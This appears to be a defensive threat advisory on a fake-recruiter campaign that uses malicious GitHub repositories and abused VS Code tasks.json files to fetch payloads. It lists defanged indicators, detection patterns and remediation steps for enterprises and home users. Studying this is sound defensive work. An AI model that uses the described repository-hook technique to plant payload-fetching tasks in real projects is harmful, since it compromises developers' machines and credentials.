Technical Analysis & Remediations
MITRE ATT&CK Mapping
T1566.002
Phishing: Spearphishing Link
T1204.001
User Execution: Malicious Link
T1059.001
Command and Scripting Interpreter: PowerShell
T1059.003
Command and Scripting Interpreter: Windows Command Shell
T1059.005
Command and Scripting Interpreter: Visual Basic
CVE Profile
N/A [Social Engineering / Living-off-the-Land (LotL)]
CISA KEV Status: Inactive
Telemetry
Domains
talentacq[.]pro
publicshare[.]org
astrabytesyncs[.]com
IP Addresses
95.169.180[.]140
144.172.93[.]88
Files & Hashes
VBScript start.vbs
(SHA256: 5e307ef3aa9f20d963382700173530cdc455c1523631bbe22ede3710a2a30373)
Python payload nvidia.py
(SHA256: 1b42fc77155bd78b098e0b72440dd72d6154312569e6ba46f1e5dc94b31c6b42)
and renamed binary "csshost[.]exe"
Constraint
The structure of the malicious GitHub repositories suggests active manipulation of standard developer workflows, specifically abusing Node.js fetch API and Visual Studio Code .vscode/tasks.json configuration files to seamlessly retrieve secondary payloads from Vercel staging environments.
Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)
GOVERN (GV) – Crisis Management & Oversight
Command
Issue mandatory communication to all development and engineering teams regarding the operational risk of fake recruiter engagement and unauthorized code execution from untrusted GitHub repositories.
DETECT (DE) – Monitoring & Analysis
Command
Deploy EDR hunting queries to detect wscript[.]exe or cmd[.]exe executing from the %TEMP% directory, specifically looking for anomalous archive extraction (Expand-Archive or tar).
Command
Implement SIEM alerts for unusual parent-child process relationships, such as node.exe spawning outbound network connections to vercel.app subdomains.
RESPOND (RS) – Mitigation & Containment
Command
Isolate any endpoint displaying network telemetry destined for the known C2 IP addresses (95.169.180[.]140, 144.172.93[.]88).
Command
Terminate anomalous Python processes executing from non-standard directories, especially if named csshost[.]exe.
RECOVER (RC) – Restoration & Trust
Command
Validate the integrity of compromised developer workstations via deep forensic analysis of browser extension data and cryptocurrency wallet structures before rejoining the domain.
IDENTIFY & PROTECT (ID/PR) – The Feedback Loop
Command
Restrict the execution of VBScript (.vbs) files via Group Policy (GPO) for standard users.
Command
Enforce Application Control (e.g., AppLocker or WDAC) to prevent the execution of unapproved Python binaries dropped into user space.
Remediation - THE HOME USER TRACK (Safety Focus)
Priority 1: Safety
Command
Disconnect from the internet immediately if you have pasted and executed terminal commands prompted by a "verification" or "error" page during a job interview process.
Command
Do not log into banking, cryptocurrency wallets, or primary email accounts on the affected system until verified clean.
Priority 2: Identity
Command
Reset all critical passwords and rotate MFA tokens using a known clean device (e.g., your mobile phone on a cellular 5G network), prioritizing cryptocurrency exchange and GitHub credentials.
Priority 3: Persistence
Command
Check scheduled tasks, startup folders, and Chrome/Edge browser extensions for unrecognized additions that may facilitate data exfiltration or persistent RAT access.
Hardening & References
Baseline
CIS Microsoft Windows Desktop Benchmarks (Scripting and Application Control guidelines).
Framework
NIST CSF 2.0 / SP 800-61r3 (Incident Handling).
Hardening Directive
Developers must strictly audit project .env files and .vscode/tasks.json configurations when cloning external repositories, ensuring no obfuscated curl/wget commands or unauthorized API keys are present prior to execution.
Source
Sophos X-Ops Original Report
